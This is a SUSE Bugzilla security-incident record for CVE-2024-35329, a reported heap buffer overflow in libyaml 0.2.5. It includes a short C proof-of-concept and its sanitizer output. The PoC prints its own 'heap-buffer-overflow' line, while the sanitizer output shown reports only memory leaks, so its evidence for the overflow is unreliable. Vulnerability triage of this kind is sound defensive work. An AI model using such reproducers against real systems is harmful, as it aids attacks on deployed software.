Bug 1226195 (CVE-2024-35329)

Summary:	VUL-0: CVE-2024-35329: libyaml: vulnerable to a heap-based Buffer Overflow in yaml_document_add_sequence in api.c
Product:	[Novell Products] SUSE Security Incidents	Reporter:	SMASH SMASH <smash_bz>
Component:	Incidents	Assignee:	Jordi Massaguer <jmassaguerpla>
Status:	NEW ---	QA Contact:	Security Team bot <security-team>
Severity:	Normal
Priority:	P3 - Medium	CC:	abergmann, tina.mueller
Version:	unspecified
Target Milestone:	---
Hardware:	Other
OS:	Other
URL:	https://smash.suse.de/issue/410052/
Whiteboard:	CVSSv3.1:SUSE:CVE-2024-35329:5.4:(AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L)
Found By:	Security Response Team	Services Priority:
Business Priority:		Blocker:	---
Marketing QA Status:	---	IT Deployment:	---

Description SMASH SMASH 2024-06-11 14:19:46 UTC

libyaml 0.2.5 is vulnerable to a heap-based Buffer Overflow in yaml_document_add_sequence in api.c.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2024-35329
https://www.cve.org/CVERecord?id=CVE-2024-35329
https://drive.google.com/file/d/1xgQ9hJ7Sn5RVEsdMGvIy0s3b_bg3Wyk-/view?usp=sharing
https://github.com/yaml/libyaml/releases/tag/0.2.5
https://bugzilla.redhat.com/show_bug.cgi?id=2291258

Comment 1 Alexander Bergmann 2024-06-11 14:20:11 UTC

Reproducer:
https://drive.google.com/file/d/1xgQ9hJ7Sn5RVEsdMGvIy0s3b_bg3Wyk-/view

/* Build:
 * gcc -fsanitize=address -Wall -lyaml -o poc poc.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <yaml.h>

void poc() {
    yaml_document_t document;
    memset(&document, 0, sizeof(yaml_document_t));
    yaml_char_t *anchor = "rsslab";
    yaml_char_t *tag = "tag:yaml.org,2002:str";
    int style = YAML_ANY_SEQUENCE_STYLE;
    yaml_document_add_sequence(&document, tag, style);
}

int main(int argc, char *argv[])
{
    printf("heap-buffer-overflow on libyaml/src/api.c:1274:10\n");
    poc();
    return 0;
}


# ./poc 
heap-buffer-overflow on libyaml/src/api.c:1274:10

=================================================================
==1524==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 64 byte(s) in 1 object(s) allocated from:
    #0 0x7fcdf58ec110 in malloc (/usr/lib64/libasan.so.4+0xdc110)
    #1 0x7fcdf5408d81 in yaml_document_add_sequence (/usr/lib64/libyaml-0.so.2+0x8d81)

Direct leak of 22 byte(s) in 1 object(s) allocated from:
    #0 0x7fcdf5886e30 in __interceptor_strdup (/usr/lib64/libasan.so.4+0x76e30)
    #1 0x7fcdf5408d6f in yaml_document_add_sequence (/usr/lib64/libyaml-0.so.2+0x8d6f)

Direct leak of 1 byte(s) in 1 object(s) allocated from:
    #0 0x7fcdf58ec110 in malloc (/usr/lib64/libasan.so.4+0xdc110)
    #1 0x7fcdf54067ad in yaml_stack_extend (/usr/lib64/libyaml-0.so.2+0x67ad)

SUMMARY: AddressSanitizer: 87 byte(s) leaked in 3 allocation(s).